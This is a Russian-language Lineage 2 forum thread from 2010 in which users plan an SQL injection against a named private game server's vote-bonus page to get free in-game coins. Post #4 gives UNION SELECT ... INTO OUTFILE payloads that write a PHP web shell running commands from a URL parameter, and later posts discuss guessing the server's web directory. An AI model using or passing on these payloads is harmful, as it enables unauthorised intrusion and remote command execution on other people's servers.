 |
Мысли по поводу приза за голосование... - Общение и обсуждение, архив Lineage 2 - Cобытия, информация, вопросы и ответы по Lineage 2 |
13.02.2010, 15:24
|
#1
|
|
|
|
Пехотинец
|
 Регистрация: 24.05.2009
 Сообщений: 94
 Популярность: 152
 Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
|
Мысли по поводу приза за голосование...
Так как я начал изучать SQL Injection. Меня это наталкнуло на идею... Как через иньекцию получить заветные монетки... Ну что же начну рассказывать суть идеи...
Так как иньекция проводиться не только через адресную строку, но и в других полях ввода... На пример вход в личный кабинет или ввод ника для получения бонуса, я попытался провести мнъекцию... Но в связи не хваткой опыта процес встал в штыки... Для теста я решил использовать некий сервер ... Стрёмненький такой сервачок грация финал... Заходя на страцицу получения бонуса я поочерёдно начал вставлять произвольные не матиматические символы... Так вот после нескольких попыток я ввёл ковычку в конце ника... Вышло сообщение об ошибке синтаксиса...
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''AxE'' LIMIT 1' at line 1
1
Так же если вставлять ковычку в начало то после неё сервер не читает текст...
Так вот я подумал... Что если вставлять некие команды в в конце ника... Но так как я не знаю не php не mysql а учить их меня ломает, на этом я заступрился... Давайте продвигать тему...
________________
Чё уставился, СПАСИБО жми =)) Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
P.S
КаПаЙ
|
|
|
13.02.2010, 16:23
|
#2
|
|
|
|
Разведчик
|
 Регистрация: 07.02.2010
 Сообщений: 31
 Популярность: 26
 Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
|
Re: Мысли по поводу приза за голосование...
с mysql знаком, что за сервачек для теста, я что нить на нем поэксперементирую и поотписываю в тему.
Таким способом можно провести sql-инжект, но кроме как получения инфы из таблиц я не вижу.
|
|
|
13.02.2010, 16:25
|
#3
|
|
|
|
Пехотинец
|
 Регистрация: 24.05.2009
 Сообщений: 94
 Популярность: 152
 Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
|
Re: Мысли по поводу приза за голосование...
Сервак l2fl.org...
________________
Чё уставился, СПАСИБО жми =)) Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
P.S
КаПаЙ
|
|
|
13.02.2010, 16:56
|
#4
|
|
|
|
Разведчик
|
 Регистрация: 07.02.2010
 Сообщений: 31
 Популярность: 26
 Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
|
Re: Мысли по поводу приза за голосование...
помоему тут фильтрация
хотя...
если подобрать путь, можно заюзать это
pirat'union select '<?php passthru($_GET["cmd"]); ?>' into outfile '/httpd/www/html/class.php'#
pirat'union select '<?php passthru($_GET["cmd"]); ?>' into outfile '/l2fl.org/vote/class.php'#
У тебя какие продвижения?
Последний раз редактировалось CeDou; 13.02.2010 в 17:22.
|
|
|
Пользователь сказал cпасибо:
|
|
13.02.2010, 21:00
|
#5
|
|
|
|
Пехотинец
|
 Регистрация: 24.05.2009
 Сообщений: 94
 Популярность: 152
 Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
|
Re: Мысли по поводу приза за голосование...
Абсольтно никаких... А как обычно подбирают директорию???
________________
Чё уставился, СПАСИБО жми =)) Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
P.S
КаПаЙ
|
|
|
13.02.2010, 21:09
|
#6
|
|
|
|
Разведчик
|
 Регистрация: 07.02.2010
 Сообщений: 31
 Популярность: 26
 Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
|
Re: Мысли по поводу приза за голосование...
|
|
|
13.02.2010, 22:07
|
#7
|
|
|
|
Пехотинец
|
 Регистрация: 24.05.2009
 Сообщений: 94
 Популярность: 152
 Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
|
Re: Мысли по поводу приза за голосование...
Если так судить то по любому в директории будет стоять папка /skripts/ или /l2top/...
________________
Чё уставился, СПАСИБО жми =)) Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
P.S
КаПаЙ
|
|
|
Ваши права в разделе
|
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
|
|
|
Заявление об ответственности / Список мошенников
Часовой пояс GMT +4, время: 10:15.
|
 |